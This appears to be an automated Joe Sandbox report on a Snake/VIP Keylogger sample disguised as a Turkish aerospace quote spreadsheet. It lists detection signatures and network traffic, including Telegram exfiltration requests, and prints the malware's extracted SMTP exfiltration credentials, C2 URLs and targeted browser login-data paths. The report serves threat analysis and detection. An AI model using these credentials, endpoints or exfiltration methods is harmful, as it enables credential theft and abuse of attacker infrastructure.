Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Overview

General Information

Sample name:TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
renamed because original name is a hash value
Original sample name:TEKLF STE - TUSA TRK HAVACILIK UZAY SANAY_xlsx.exe
Analysis ID:1574855
MD5:037b9dc9d5bee07e111173cbe87624b4
SHA1:881d8ba41c222c0ff9ee96dab3e954417da6c34f
SHA256:3f9ac29a06c3a7145971c352ecc386b94dc13be8b479d09c920f36e20f6b1b41
Tags:exegeoMassLoggerTURuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected UAC Bypass using CMSTP
Yara detected VIP Keylogger
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe (PID: 6740 cmdline: "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe" MD5: 037B9DC9D5BEE07E111173CBE87624B4)
    • conhost.exe (PID: 3660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 3344 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 1904 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • WerFault.exe (PID: 4200 cmdline: C:\Windows\system32\WerFault.exe -u -p 6740 -s 1028 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
    00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
          00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 16 entries
            SourceRuleDescriptionAuthorStrings
            0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2bea0:$a1: get_encryptedPassword
                  • 0x2c428:$a2: get_encryptedUsername
                  • 0x2bb13:$a3: get_timePasswordChanged
                  • 0x2bc2a:$a4: get_passwordField
                  • 0x2beb6:$a5: set_encryptedPassword
                  • 0x2ebd2:$a6: get_passwords
                  • 0x2ef66:$a7: get_logins
                  • 0x2ebbe:$a8: GetOutlookPasswords
                  • 0x2e577:$a9: StartKeylogger
                  • 0x2eebf:$a10: KeyLoggerEventArgs
                  • 0x2e617:$a11: KeyLoggerEventArgsEventHandler
                  0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                  • 0x3948e:$a2: \Comodo\Dragon\User Data\Default\Login Data
                  • 0x38b31:$a3: \Google\Chrome\User Data\Default\Login Data
                  • 0x38d8e:$a4: \Orbitum\User Data\Default\Login Data
                  • 0x3976d:$a5: \Kometa\User Data\Default\Login Data
                  Click to see the 26 entries
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-13T17:47:34.911215+010028033053Unknown Traffic192.168.2.849709104.21.67.152443TCP
                  2024-12-13T17:47:38.152950+010028033053Unknown Traffic192.168.2.849713104.21.67.152443TCP
                  2024-12-13T17:47:41.414563+010028033053Unknown Traffic192.168.2.849717104.21.67.152443TCP
                  2024-12-13T17:47:44.687718+010028033053Unknown Traffic192.168.2.849719104.21.67.152443TCP
                  2024-12-13T17:47:57.776310+010028033053Unknown Traffic192.168.2.849727104.21.67.152443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-13T17:47:30.501678+010028032742Potentially Bad Traffic192.168.2.849704132.226.8.16980TCP
                  2024-12-13T17:47:33.251737+010028032742Potentially Bad Traffic192.168.2.849704132.226.8.16980TCP
                  2024-12-13T17:47:36.517401+010028032742Potentially Bad Traffic192.168.2.849711132.226.8.16980TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeReversingLabs: Detection: 52%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Source: unknownDNS query: name: reallyfreegeoip.org

                  Exploits

                  barindex
                  Source: Yara matchFile source: 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 6740, type: MEMORYSTR
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.8:49706 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49728 version: TLS 1.2
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER8D7A.tmp.dmp.7.dr
                  Source: Binary string: System.pdb2& source: WER8D7A.tmp.dmp.7.dr
                  Source: Binary string: mscorlib.pdb source: WER8D7A.tmp.dmp.7.dr
                  Source: Binary string: System.ni.pdbRSDS source: WER8D7A.tmp.dmp.7.dr
                  Source: Binary string: mscorlib.ni.pdb source: WER8D7A.tmp.dmp.7.dr
                  Source: Binary string: System.Core.pdb source: WER8D7A.tmp.dmp.7.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER8D7A.tmp.dmp.7.dr
                  Source: Binary string: Microsoft.VisualBasic.pdbH source: WER8D7A.tmp.dmp.7.dr
                  Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER8D7A.tmp.dmp.7.dr
                  Source: Binary string: System.ni.pdb source: WER8D7A.tmp.dmp.7.dr
                  Source: Binary string: System.pdb source: WER8D7A.tmp.dmp.7.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WER8D7A.tmp.dmp.7.dr
                  Source: Binary string: Microsoft.VisualBasic.pdb source: WER8D7A.tmp.dmp.7.dr
                  Source: Binary string: System.Core.ni.pdb source: WER8D7A.tmp.dmp.7.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 013FF8E9h3_2_013FF631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 013FFD41h3_2_013FFA88

                  Networking

                  barindex
                  Source: unknownDNS query: name: api.telegram.org
                  Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, type: UNPACKEDPE
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:562258%0D%0ADate%20and%20Time:%2014/12/2024%20/%2016:26:30%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20562258%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49704 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49711 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49717 -> 104.21.67.152:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49719 -> 104.21.67.152:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49713 -> 104.21.67.152:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49709 -> 104.21.67.152:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49727 -> 104.21.67.152:443
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.8:49706 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:562258%0D%0ADate%20and%20Time:%2014/12/2024%20/%2016:26:30%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20562258%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 13 Dec 2024 16:47:59 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: RegAsm.exe, 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: RegAsm.exe, 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: RegAsm.exe, 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: RegAsm.exe, 00000003.00000002.4019025145.0000000003116000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.0000000003116000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: RegAsm.exe, 00000003.00000002.4019025145.0000000003116000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: RegAsm.exe, 00000003.00000002.4019025145.0000000003116000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:562258%0D%0ADate%20a
                  Source: RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: RegAsm.exe, 00000003.00000002.4019025145.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.0000000003221000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: RegAsm.exe, 00000003.00000002.4019025145.00000000031EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: RegAsm.exe, 00000003.00000002.4019025145.0000000003116000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.000000000307F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.00000000030EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.000000000307F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: RegAsm.exe, 00000003.00000002.4019025145.00000000030EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: RegAsm.exe, 00000003.00000002.4019025145.0000000003116000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.00000000030A9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.00000000030EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
